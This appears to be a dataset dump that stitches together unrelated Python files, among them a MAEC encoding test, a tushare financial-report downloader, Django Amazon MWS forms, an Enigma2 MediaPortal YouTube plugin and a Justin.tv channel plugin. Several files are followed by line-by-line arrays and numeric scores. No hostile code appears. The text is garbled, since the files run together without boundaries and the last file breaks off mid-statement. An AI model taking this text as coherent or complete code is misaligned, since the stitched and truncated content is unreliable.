b.to_xml(encoding=encoding) self.assertTrue(UNICODE_STR in xml.decode(encoding)) def test_to_xml_default_encoded(self): b = Behavior() b.description = UNICODE_STR xml = b.to_xml() self.assertTrue(UNICODE_STR in xml.decode('utf-8')) def test_to_xml_no_encoding(self): b = Behavior() b.description = UNICODE_STR xml = b.to_xml(encoding=None) self.assertTrue(isinstance(xml, text_type)) self.assertTrue(UNICODE_STR in xml) if __name__ == "__main__": unittest.main()
[ "# -*- coding: utf-8 -*-\n", "# Copyright (c) 2018, The MITRE Corporation. All rights reserved.\n", "# See LICENSE.txt for complete terms.\n", "\n", "\"\"\"Tests for various encoding issues throughout the library\"\"\"\n", "\n", "import unittest\n", "\n", "from mixbox import binding_utils\n", "from mixbox.vendor.six import text_type\n", "\n", "from maec.package.malware_subject import MalwareConfigurationParameter\n", "from maec.package.analysis import DynamicAnalysisMetadata\n", "from maec.package.grouping_relationship import GroupingRelationship\n", "from maec.bundle.bundle import Bundle\n", "from maec.bundle.av_classification import AVClassification\n", "from maec.bundle.behavior import Behavior\n", "from maec.bundle.capability import Capability\n", "import maec.utils\n", "\n", "from cybox.test import round_trip\n", "\n", "UNICODE_STR = u\"❤ ♎ ☀ ★ ☂ ♞ ☯ ☭ ☢ €☎⚑ ❄♫✂\"\n", "\n", "class EncodingTests(unittest.TestCase):\n", "\n", " @classmethod\n", " def setUpClass(cls):\n", " cls.orig_encoding = binding_utils.ExternalEncoding\n", " binding_utils.ExternalEncoding = 'utf-16'\n", "\n", " @classmethod\n", " def tearDownClass(cls):\n", " binding_utils.ExternalEncoding = cls.orig_encoding\n", "\n", " def test_malware_configuration_parameter(self):\n", " config = MalwareConfigurationParameter()\n", " config.value = UNICODE_STR\n", " config2 = round_trip(config)\n", " self.assertEqual(config.value, config2.value)\n", "\n", " def test_dynamic_analysis_metadata(self):\n", " metadata = DynamicAnalysisMetadata()\n", " metadata.command_line = UNICODE_STR\n", " metadata2 = round_trip(metadata)\n", " self.assertEqual(metadata.command_line, metadata2.command_line)\n", "\n", " def test_grouping_relationship(self):\n", " relationship = GroupingRelationship()\n", " relationship.malware_family_name = UNICODE_STR\n", " relationship.malware_toolkit_name = UNICODE_STR\n", " relationship2 = round_trip(relationship)\n", " self.assertEqual(relationship.malware_family_name, relationship2.malware_family_name)\n", " self.assertEqual(relationship.malware_toolkit_name, relationship2.malware_toolkit_name)\n", "\n", " def test_behavior(self):\n", " behavior = Behavior()\n", " behavior.description = UNICODE_STR\n", " behavior2 = round_trip(behavior)\n", " self.assertEqual(behavior.description, behavior2.description)\n", "\n", " def test_capability(self):\n", " capability = Capability()\n", " capability.description = UNICODE_STR\n", " capability2 = round_trip(capability)\n", " self.assertEqual(capability.description, capability2.description)\n", "\n", " def test_av_classification(self):\n", " av_class = AVClassification()\n", " av_class.engine_version = UNICODE_STR\n", " av_class.definition_version = UNICODE_STR\n", " av_class.classification_name = UNICODE_STR\n", " av_class2 = round_trip(av_class)\n", " self.assertEqual(av_class.engine_version, av_class2.engine_version)\n", " self.assertEqual(av_class.definition_version, av_class2.definition_version)\n", " self.assertEqual(av_class.classification_name, av_class2.classification_name)\n", "\n", " def test_to_xml_utf16_encoded(self):\n", " encoding = 'utf-16'\n", " b = Behavior()\n", " b.description = UNICODE_STR\n", " xml = b.to_xml(encoding=encoding)\n", " self.assertTrue(UNICODE_STR in xml.decode(encoding))\n", "\n", " def test_to_xml_default_encoded(self):\n", " b = Behavior()\n", " b.description = UNICODE_STR\n", " xml = b.to_xml()\n", " self.assertTrue(UNICODE_STR in xml.decode('utf-8'))\n", "\n", " def test_to_xml_no_encoding(self):\n", " b = Behavior()\n", " b.description = UNICODE_STR\n", " xml = b.to_xml(encoding=None)\n", " self.assertTrue(isinstance(xml, text_type))\n", " self.assertTrue(UNICODE_STR in xml)\n", "\n", "if __name__ == \"__main__\":\n", " unittest.main()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0 ]
99
0.001077
false
import tushare as ts import storage as storage import datetime as datetime import sys import os import sqlalchemy as sqlalchemy def get_year_season(offset): y = datetime.datetime.now().year s = ((datetime.datetime.now().month + 2) // 3) + offset if (s==0): y = y -1 s = 4 return (y,s) def available(year,season): print("valid report data") r = ts.get_report_data(year,season) if r is None: return False return True def save(r, name,year,season): if r is None: return None r['year'] = year r['season'] = season r['ts'] = datetime.datetime.now() storage.save_sql(r,name, mode='append', dtype={'year': sqlalchemy.types.VARCHAR(20), 'season': sqlalchemy.types.VARCHAR(20) }) def get_report_data(year,season): if not available(year, season): return None; print("get_report_data") save(ts.get_report_data(year,season),"basics/report_data",year,season) print("get_profit_data") save(ts.get_profit_data(year,season),"basics/profit_data",year,season) filename = "operation_data" print("get_operation_data") save(ts.get_operation_data(year,season),"basics/operation_data",year,season) filename = "growth_data" print("get_growth_data") save(ts.get_growth_data(year,season),"basics/growth_data",year,season) filename = "get_debtpaying_data" print("get_debtpaying_data") save(ts.get_debtpaying_data(year,season),"basics/debtpaying_data",year,season) filename = "get_debtpaying_data" print("get_cashflow_data") save(ts.get_cashflow_data(year,season),"basics/cashflow_data",year,season) if len(sys.argv) < 2: (year, season) = get_year_season(0) print("get report data for season ",year, "/", season) get_report_data(year, season) else: thisyear = datetime.datetime.now().year year = thisyear + int(sys.argv[1]) for iyear in range(year,thisyear): for iseason in range(1,4): print("get report data for season ",iyear, "/", iseason) get_report_data(iyear, iseason)
[ "import tushare as ts\n", "import storage as storage\n", "import datetime as datetime\n", "import sys\n", "import os\n", "import sqlalchemy as sqlalchemy\n", "\n", "def get_year_season(offset):\n", " y = datetime.datetime.now().year\n", " s = ((datetime.datetime.now().month + 2) // 3) + offset\n", "\n", " if (s==0):\n", " y = y -1\n", " s = 4\n", "\n", " return (y,s)\n", "\n", "def available(year,season):\n", " print(\"valid report data\")\n", " r = ts.get_report_data(year,season)\n", " if r is None:\n", " return False\n", " return True\n", "\n", "def save(r, name,year,season):\n", " if r is None:\n", " return None\n", "\n", " r['year'] = year\n", " r['season'] = season\n", " r['ts'] = datetime.datetime.now()\n", "\n", " storage.save_sql(r,name, mode='append',\n", " dtype={'year': sqlalchemy.types.VARCHAR(20),\n", " 'season': sqlalchemy.types.VARCHAR(20)\n", " })\n", "\n", "def get_report_data(year,season):\n", " if not available(year, season):\n", " return None;\n", "\n", " print(\"get_report_data\")\n", " save(ts.get_report_data(year,season),\"basics/report_data\",year,season)\n", "\n", " print(\"get_profit_data\")\n", " save(ts.get_profit_data(year,season),\"basics/profit_data\",year,season)\n", "\n", " filename = \"operation_data\"\n", " print(\"get_operation_data\")\n", " save(ts.get_operation_data(year,season),\"basics/operation_data\",year,season)\n", "\n", " filename = \"growth_data\"\n", " print(\"get_growth_data\")\n", " save(ts.get_growth_data(year,season),\"basics/growth_data\",year,season)\n", "\n", " filename = \"get_debtpaying_data\"\n", " print(\"get_debtpaying_data\")\n", " save(ts.get_debtpaying_data(year,season),\"basics/debtpaying_data\",year,season)\n", "\n", " filename = \"get_debtpaying_data\"\n", " print(\"get_cashflow_data\")\n", " save(ts.get_cashflow_data(year,season),\"basics/cashflow_data\",year,season)\n", "\n", "if len(sys.argv) < 2:\n", " (year, season) = get_year_season(0)\n", " print(\"get report data for season \",year, \"/\", season)\n", " get_report_data(year, season)\n", "else:\n", " thisyear = datetime.datetime.now().year\n", " year = thisyear + int(sys.argv[1])\n", " for iyear in range(year,thisyear):\n", " for iseason in range(1,4):\n", " print(\"get report data for season \",iyear, \"/\", iseason)\n", " get_report_data(iyear, iseason)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0.06666666666666667, 0.058823529411764705, 0, 0, 0.058823529411764705, 0, 0.07142857142857142, 0, 0.025, 0, 0, 0, 0, 0.0967741935483871, 0, 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0, 0.058823529411764705, 0, 0.047619047619047616, 0, 0, 0.05333333333333334, 0, 0, 0.05333333333333334, 0, 0, 0, 0.06172839506172839, 0, 0, 0, 0.05333333333333334, 0, 0, 0, 0.060240963855421686, 0, 0, 0, 0.05063291139240506, 0, 0.045454545454545456, 0, 0.01694915254237288, 0, 0, 0, 0, 0.02564102564102564, 0.02857142857142857, 0.014492753623188406, 0 ]
74
0.013579
false
from django import forms from django.db.models import get_model from django.utils.translation import ugettext_lazy as _ AmazonMarketplace = get_model('oscar_mws', 'AmazonMarketplace') class MwsProductFeedForm(forms.Form): FEED_CREATE_PRODUCTS = 'submit_product_feed' FEED_SWITCH_TO_AFN = 'switch_to_afn' UPDATE_PRODUCT_IDENTIFIERS = 'update_product_identifiers' UPDATE_STOCK = 'update_stock' FEED_CHOICES = ( (FEED_CREATE_PRODUCTS, _("Create new products")), (FEED_SWITCH_TO_AFN, _("Switch to 'Fulfillment by Amazon'")), (UPDATE_PRODUCT_IDENTIFIERS, _("Update product ASINs")), (UPDATE_STOCK, _("Update product stock")), ) submission_selection = forms.ChoiceField(choices=FEED_CHOICES) marketplace = forms.ModelChoiceField( queryset=AmazonMarketplace.objects.none(), required=True, empty_label=None, label=_("Marketplace"), ) def __init__(self, *args, **kwargs): super(MwsProductFeedForm, self).__init__(*args, **kwargs) self.fields['marketplace'].queryset = AmazonMarketplace.objects.all() class AmazonProfileUpdateForm(forms.ModelForm): class Meta: model = get_model('oscar_mws', 'AmazonProfile') exclude = ('product', 'asin') class AmazonProfileCreateForm(forms.ModelForm): class Meta: model = get_model('oscar_mws', 'AmazonProfile') exclude = ('asin',) def __init__(self, *args, **kwargs): product = kwargs.pop('product') super(AmazonProfileCreateForm, self).__init__(*args, **kwargs) self.fields['product'].initial = product self.fields['product'].widget = forms.HiddenInput()
[ "from django import forms\n", "from django.db.models import get_model\n", "from django.utils.translation import ugettext_lazy as _\n", "\n", "AmazonMarketplace = get_model('oscar_mws', 'AmazonMarketplace')\n", "\n", "\n", "class MwsProductFeedForm(forms.Form):\n", " FEED_CREATE_PRODUCTS = 'submit_product_feed'\n", " FEED_SWITCH_TO_AFN = 'switch_to_afn'\n", " UPDATE_PRODUCT_IDENTIFIERS = 'update_product_identifiers'\n", " UPDATE_STOCK = 'update_stock'\n", " FEED_CHOICES = (\n", " (FEED_CREATE_PRODUCTS, _(\"Create new products\")),\n", " (FEED_SWITCH_TO_AFN, _(\"Switch to 'Fulfillment by Amazon'\")),\n", " (UPDATE_PRODUCT_IDENTIFIERS, _(\"Update product ASINs\")),\n", " (UPDATE_STOCK, _(\"Update product stock\")),\n", " )\n", " submission_selection = forms.ChoiceField(choices=FEED_CHOICES)\n", " marketplace = forms.ModelChoiceField(\n", " queryset=AmazonMarketplace.objects.none(),\n", " required=True,\n", " empty_label=None,\n", " label=_(\"Marketplace\"),\n", " )\n", "\n", " def __init__(self, *args, **kwargs):\n", " super(MwsProductFeedForm, self).__init__(*args, **kwargs)\n", " self.fields['marketplace'].queryset = AmazonMarketplace.objects.all()\n", "\n", "\n", "class AmazonProfileUpdateForm(forms.ModelForm):\n", " class Meta:\n", " model = get_model('oscar_mws', 'AmazonProfile')\n", " exclude = ('product', 'asin')\n", "\n", "\n", "class AmazonProfileCreateForm(forms.ModelForm):\n", " class Meta:\n", " model = get_model('oscar_mws', 'AmazonProfile')\n", " exclude = ('asin',)\n", "\n", " def __init__(self, *args, **kwargs):\n", " product = kwargs.pop('product')\n", " super(AmazonProfileCreateForm, self).__init__(*args, **kwargs)\n", " self.fields['product'].initial = product\n", " self.fields['product'].widget = forms.HiddenInput()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
47
0
false
# -*- coding: utf-8 -*- from os.path import exists from Plugins.Extensions.MediaPortal.plugin import _ from Plugins.Extensions.MediaPortal.resources.imports import * from Plugins.Extensions.MediaPortal.additions.mediatheken.youtube import YT_ListScreen default_cover = "file://%s/youtube.png" % (config.mediaportal.iconcachepath.value + "logos") class show_USER_Genre(MPScreen): def __init__(self, session): MPScreen.__init__(self, session, skin='MP_Plugin') self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel, "green" : self.keyGreen }, -1) self['title'] = Label("YouTube") self['ContentTitle'] = Label(_("User Channels")) self['name'] = Label(_("Selection:")) self['F1'] = Label(_("Exit")) self['F2'] = Label(_("Load")) self.user_path = config.mediaportal.watchlistpath.value + "mp_userchan.xml" self.show_help = config.mediaportal.show_userchan_help.value self.keyLocked = True self.genreliste = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): CoverHelper(self['coverArt']).getCover(default_cover) if not exists(self.user_path): self.getUserFile(fInit=True) if self.show_help: self.genreliste.append((_("With this extension you can add your favorite YouTube channels themselves."), "")) self.genreliste.append(("", "")) self.genreliste.append((_("For each channel, only two entries are added:"), "")) self.genreliste.append((_("'<name> channel name </name>' and '<user> owner name </user>'"), "")) self.genreliste.append(("", "")) self.genreliste.append((_("With the 'Green' button the user file:"), "")) self.genreliste.append((_("'%s' is loaded.") % self.user_path, "")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) else: self.getUserFile() def getUserFile(self, fInit=False): fname = mp_globals.pluginPath + "/userfiles/userchan.xml" try: if fInit: shutil.copyfile(fname, self.user_path) return fp = open(self.user_path) data = fp.read() fp.close() except IOError, e: self.genreliste = [] self.genreliste.append((str(e), "")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) else: list = re.findall('<name>(.*?)</name>.*?<user>(.*?)</user>', data, re.S) self.genreliste = [] if list: for (name, user) in list: self.genreliste.append((name.strip(), '/'+user.strip())) self.keyLocked = False else: self.genreliste.append((_("No channels found!"), "")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) def keyGreen(self): self.getUserFile() def keyOK(self): if self.keyLocked: return genre = self['liste'].getCurrent()[0][0] stvLink = self['liste'].getCurrent()[0][1] if stvLink == '/': return url = "gdata.youtube.com/feeds/api/users"+stvLink+"/uploads?" self.session.open(YT_ListScreen, url, genre, title="YouTube")
[ "# -*- coding: utf-8 -*-\n", "from os.path import exists\n", "from Plugins.Extensions.MediaPortal.plugin import _\n", "from Plugins.Extensions.MediaPortal.resources.imports import *\n", "from Plugins.Extensions.MediaPortal.additions.mediatheken.youtube import YT_ListScreen\n", "default_cover = \"file://%s/youtube.png\" % (config.mediaportal.iconcachepath.value + \"logos\")\n", "\n", "class show_USER_Genre(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\n", "\t\tMPScreen.__init__(self, session, skin='MP_Plugin')\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"green\"\t: self.keyGreen\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"YouTube\")\n", "\t\tself['ContentTitle'] = Label(_(\"User Channels\"))\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\t\tself['F1'] = Label(_(\"Exit\"))\n", "\t\tself['F2'] = Label(_(\"Load\"))\n", "\n", "\t\tself.user_path = config.mediaportal.watchlistpath.value + \"mp_userchan.xml\"\n", "\t\tself.show_help = config.mediaportal.show_userchan_help.value\n", "\t\tself.keyLocked = True\n", "\t\tself.genreliste = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tCoverHelper(self['coverArt']).getCover(default_cover)\n", "\t\tif not exists(self.user_path):\n", "\t\t\tself.getUserFile(fInit=True)\n", "\n", "\t\tif self.show_help:\n", "\t\t\tself.genreliste.append((_(\"With this extension you can add your favorite YouTube channels themselves.\"), \"\"))\n", "\t\t\tself.genreliste.append((\"\", \"\"))\n", "\t\t\tself.genreliste.append((_(\"For each channel, only two entries are added:\"), \"\"))\n", "\t\t\tself.genreliste.append((_(\"'<name> channel name </name>' and '<user> owner name </user>'\"), \"\"))\n", "\t\t\tself.genreliste.append((\"\", \"\"))\n", "\t\t\tself.genreliste.append((_(\"With the 'Green' button the user file:\"), \"\"))\n", "\t\t\tself.genreliste.append((_(\"'%s' is loaded.\") % self.user_path, \"\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\telse:\n", "\t\t\tself.getUserFile()\n", "\n", "\tdef getUserFile(self, fInit=False):\n", "\t\tfname = mp_globals.pluginPath + \"/userfiles/userchan.xml\"\n", "\t\ttry:\n", "\t\t\tif fInit:\n", "\t\t\t\tshutil.copyfile(fname, self.user_path)\n", "\t\t\t\treturn\n", "\t\t\tfp = open(self.user_path)\n", "\t\t\tdata = fp.read()\n", "\t\t\tfp.close()\n", "\t\texcept IOError, e:\n", "\t\t\tself.genreliste = []\n", "\t\t\tself.genreliste.append((str(e), \"\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\telse:\n", "\t\t\tlist = re.findall('<name>(.*?)</name>.*?<user>(.*?)</user>', data, re.S)\n", "\t\t\tself.genreliste = []\n", "\t\t\tif list:\n", "\t\t\t\tfor (name, user) in list:\n", "\t\t\t\t\tself.genreliste.append((name.strip(), '/'+user.strip()))\n", "\t\t\t\tself.keyLocked = False\n", "\t\t\telse:\n", "\t\t\t\tself.genreliste.append((_(\"No channels found!\"), \"\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\n", "\tdef keyGreen(self):\n", "\t\tself.getUserFile()\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\n", "\t\tgenre = self['liste'].getCurrent()[0][0]\n", "\t\tstvLink = self['liste'].getCurrent()[0][1]\n", "\t\tif stvLink == '/':\n", "\t\t\treturn\n", "\t\turl = \"gdata.youtube.com/feeds/api/users\"+stvLink+\"/uploads?\"\n", "\t\tself.session.open(YT_ListScreen, url, genre, title=\"YouTube\")" ]
[ 0, 0, 0, 0, 0.011494252873563218, 0.010752688172043012, 0, 0.030303030303030304, 0, 0.03333333333333333, 0, 0.018867924528301886, 0, 0.020833333333333332, 0.08333333333333333, 0.08, 0.034482758620689655, 0.07407407407407407, 0.1111111111111111, 0, 0.02857142857142857, 0.0196078431372549, 0.025, 0.03125, 0.03125, 0, 0.01282051282051282, 0.015873015873015872, 0.041666666666666664, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.02, 0, 0.037037037037037035, 0.017857142857142856, 0.030303030303030304, 0.03125, 0, 0.047619047619047616, 0.017699115044247787, 0.027777777777777776, 0.023809523809523808, 0.02, 0.027777777777777776, 0.012987012987012988, 0.014084507042253521, 0.015151515151515152, 0.125, 0.045454545454545456, 0, 0.02702702702702703, 0.016666666666666666, 0.14285714285714285, 0.07692307692307693, 0.023255813953488372, 0.09090909090909091, 0.034482758620689655, 0.05, 0.07142857142857142, 0.047619047619047616, 0.041666666666666664, 0.025, 0.015151515151515152, 0.125, 0.013157894736842105, 0.041666666666666664, 0.08333333333333333, 0.03333333333333333, 0.016129032258064516, 0.037037037037037035, 0.1111111111111111, 0.017241379310344827, 0.015151515151515152, 0, 0.047619047619047616, 0.047619047619047616, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0, 0.023255813953488372, 0.022222222222222223, 0.047619047619047616, 0.1, 0.015625, 0.031746031746031744 ]
89
0.034036
false
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Canal para justin.tv by Bandavi # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os, sys import xbmc,xbmcgui,xbmcplugin from core import logger from core import config from core import scrapertools from core.item import Item from servers import servertools from platformcode.xbmc import xbmctools try: import json except: import simplejson as json __channel__ = "justintv" __category__ = "G" __type__ = "generic" __title__ = "Justin.tv" __language__ = "" __creationdate__ = "20111128" DEBUG = config.get_setting("debug") pluginhandle = int(sys.argv[1]) IMAGES_PATH = xbmc.translatePath( os.path.join( config.get_runtime_path(), 'resources' , 'images' , 'posters' ) ) fanart = xbmc.translatePath(os.path.join( config.get_runtime_path(), 'resources' , 'images' ,'fanart','justintv.png')) if config.get_setting("thumbnail_type")=="0": WEB_PATH = "http://pelisalacarta.mimediacenter.info/posters/" else: WEB_PATH = "http://pelisalacarta.mimediacenter.info/banners/" jtv_icon = WEB_PATH+"justintv.png" all = config.get_localized_string(30419) languages = [all,'Arabic','Català','Cerky','Dansk','Deutsch','Greek','English','Español','Eusti Keel','suomi','Francais', 'Hindi' ,'Hrvatski','bahasa Indonesia','Italiano','Hebrew','Japanese','Korean','Lietuviu','Nederlands', 'Norsk','Polski','Portugues','Romana','Russian','Serbian','Svenska','Talagog','Turkey','Tieng Viet', 'Chinese','Taiwanese'] abbrev = ['all','ar','ca','cs','da','de','el','en','es','et','fi','fr','hi','hr','id','it','iw','ja','ko','lt','nl','no','pl','pt', 'ro','ru','sr','sv','tl','tr','vi','zh-CN','zh-TW'] limit = 50 URL_CATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/category?lang=%s&amp;order=hot' URL_SUBCATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/subcategory/%s?order=hot&amp;lang=%s' MenuLang = {'English':'en','Spanish':'es','Italian':'it','Catalan':'ca','French':'fr','Portuguese':'pt','German':'de'} try: language_menu = MenuLang[xbmc.getLanguage()] except: language_menu = 'en' def isGeneric(): return True def mainlist(item): logger.info("[justintv.py] mainlist") itemlist = [] try: lang = config.get_setting('justin_lang') if "," in lang: langs = lang.split(",") lang = '' for i in langs: idx = abbrev.index(i) if len(lang)>0: lang = lang + "," + languages[idx] else: lang = languages[idx] else: idx = abbrev.index(lang) lang = languages[idx] except: lang = 'all' idx = abbrev.index(lang) lang = languages[idx] itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30420) + ' (%s)' %lang, action="_language" ,url = "", thumbnail =WEB_PATH+ "language.jpg",fanart = fanart, folder = False)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30414), action="listcategory" ,url = "true", thumbnail='http://www-cdn.jtvnw.net/images/redesign/fp_vector_camera.png',fanart = fanart)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30413), action="listcategory" ,url = "false", thumbnail='',fanart = fanart)) return itemlist def listcategory(item): itemlist = [] config.set_setting("streamlive",item.url) listcat = getlistcategory() if item.url=='false': title = config.get_localized_string(30408) else: title = '' itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30416)+title, action="favorites" ,url = "", thumbnail=WEB_PATH+ "favoritos.png",fanart = fanart)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30415), action="getplayByID" ,url = "", thumbnail="http://thecustomizewindows.com/wp-content/uploads/2011/12/Best-Keyboard-Apps.png",fanart = fanart)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30417), action="search" ,url = "", thumbnail=WEB_PATH+"buscador.png",fanart = fanart)) for category in listcat: itemlist.append( Item(channel=__channel__, title=scrapertools.unescape(category[1]), action="subCategories" ,url = category[0], thumbnail="http://www-cdn.jtvnw.net/images/category_icons/%s.png" %category[0],fanart = fanart)) return itemlist def getlistcategory(): data = scrapertools.cache_page(URL_CATEGORY_MENU %(language_menu,language_menu)) patron = '<li class="category"><a href="/directory/([^\?]+)\?.+?">(.+?)</a></li>' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) list = [] for match in matches: list.append([match[0],match[1]]) return list def search(item,texto): texto = texto.replace(' ','+') item.title = 'search' item.url = url = 'http://api.justin.tv/api/stream/search/'+texto+'.json?offset=0&limit='+str(limit) itemlist = getlistchannel(item) if config.get_setting('streamlive')=='true': xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') else: return itemlist def getplayByID(item): logger.info("[justintv.py] plyByID") tecleado = "" default = "" itemlist = [] tecleado = teclado(heading=config.get_localized_string(30405)) if len(tecleado)>0: item.url = 'http://api.justin.tv/api/stream/list.json?channel='+tecleado itemlist = getlistchannel(item) if len(itemlist)>0: if config.get_setting('streamlive') == 'true': xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') else: return itemlist elif config.get_setting('streamlive') != 'true': xbmc.executebuiltin("XBMC.Notification(Justin tv,Streaming no encontrado... verificando archivos"+",5000,"+jtv_icon+")") item.url = tecleado item.action = 'getplayByID' itemlist = listarchives(item) if itemlist is not None and len(itemlist)>0: return itemlist else: channelANDarchivesEmpty() else: channelEmpty() return def teclado(default="", heading="", hidden=False): tecleado = "" keyboard = xbmc.Keyboard(default,heading,hidden) keyboard.doModal() if (keyboard.isConfirmed()): tecleado = keyboard.getText() if len(tecleado)<=0: return "" return tecleado def subCategories(item): logger.info("[justin.tv.py] subCategories") category = item.url url = URL_SUBCATEGORY_MENU %(language_menu,category,language_menu) data = scrapertools.cache_page(url) logger.info(data) itemlist = [] patron = '<li class="subcategory"><a href="/directory/'+category+'/([^\?]+)\?.+?">(.+?)</a></li>' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) scrapedthumbnail = "" scrapedplot = item.title itemlist.append( Item(channel=item.channel , action="listchannel" , title=config.get_localized_string(30421) , url="all" , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart )) for match in matches: scrapedurl = match[0] scrapedtitle =match[1] if (DEBUG): logger.info("title=["+scrapedtitle+"], url=["+scrapedurl+"], thumbnail=["+scrapedthumbnail+"]") # Añade al listado de XBMC itemlist.append( Item(channel=item.channel , action="listchannel" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart )) return itemlist def favorites(item): if item.url == '': username = config.get_setting("justin_login") else: username = item.url if username == "": LoginEmpty() config.open_settings() item.url = config.get_setting("justin_login") if item.url == '':return favorites(item) return item.title = "favorites" if config.get_setting('streamlive')=='true': livetrue='&live=true' else: livetrue = '' item.url = 'http://api.justin.tv/api/user/favorites/'+str(username)+'.json?offset=0&limit='+str(limit)+livetrue itemlist = getlistchannel(item) if not livetrue: return itemlist xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') return def addToFavorites(item): ''' Poner aqui el proceso para añadir un canal en favoritos/follows de una cuenta en Justin.tv''' pass def removeFromFavorites(item): ''' Poner aqui el proceso para eliminar un canal de favoritos/follows de una cuenta en Justin.tv''' pass def listchannel(item): if not "|Next Page >>" in item.title: try: lang = config.get_setting("justin_lang") if len(lang) == 0: lang = 'all' except: lang = "all" item.title = item.url if lang == 'all': lang = '' else: lang = '&language='+lang if 'all' in item.url: item.url = "http://api.justin.tv/api/stream/list.json?category=%s%s&offset=0&limit=%d" %(item.category,lang,limit) else: item.url = "http://api.justin.tv/api/stream/list.json?subcategory=%s%s&offset=0&limit=%d" %(item.title,lang,limit) itemlist = getlistchannel(item) if config.get_setting('streamlive')=='true': xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') return else: return itemlist def getlistchannel(item): logger.info("[justintv.py] getlistchannel") url = item.url title = item.title if "|Next Page >>" in item.title: item.title = item.title.split('|')[0] if item.title == 'favorites': context = '|9' # Eliminar un canal de favoritos, en el listado de favoritos solo remover else: context = '|8' # Añade un canal a favoritos, en los demas listados solo añadir data = scrapertools.cache_page(url) logger.info(data) datadict = json.loads(data) totalItems = len(datadict) itemlist = [] #print item.action c = 0 try: datadict = sorted(datadict, key=lambda k: k['video_bitrate'],reverse=True) except: pass for match in datadict: try: name = match['name'].split('user_')[-1] except: try: name = match['channel']['login'] if name is None or name =='': raise except: name = match['login'] try: title = match['channel']['title'] if title is None or title == '': raise except: try: title = match['title'] if title is None: title = '' except: title = '' try: title = title if title is None or title == '': raise except: title = name try: tags = scrapertools.unescape(match['channel']['tags']) if tags is None or tags == '': raise except: try: tags = scrapertools.unescape(match['tags']).strip() if tags is None or tags == '': raise except: tags = '' try: status = scrapertools.unescape(match['channel']['status']).strip() if status is None or status == '': raise except: try: status = scrapertools.unescape(match['status']).strip() if status is None or status == '': raise except: status = '' try: subcat = match['channel']['category_title'] if subcat is None or subcat == '': raise except: try: subcat = match['category'] if subcat is None: raise except: subcat = '' try: views = match['channel']['views_count'] except: try: views = match['channel_view_count'] except: views = '' try: bitrate = str(match['video_bitrate']).split('.')[0] except: bitrate = '' try: lang = match['language'] except: lang = '' try: scrapedthumbnail = match['channel']['screen_cap_url_medium'] except: scrapedthumbnail = match['screen_cap_url_medium'] try: fanart_thumb = match['channel']['image_url_huge'] except: try: fanart_thumb = match['image_url_huge'] except: fanart_thumb = fanart scrapedurl = name idx = abbrev.index(lang) lang = languages[idx].decode('utf-8') scrapedplot = title +'\nStatus: '+status+'\nTags: '+tags+ '\nChannel Name: '+name+'\nBitrate: 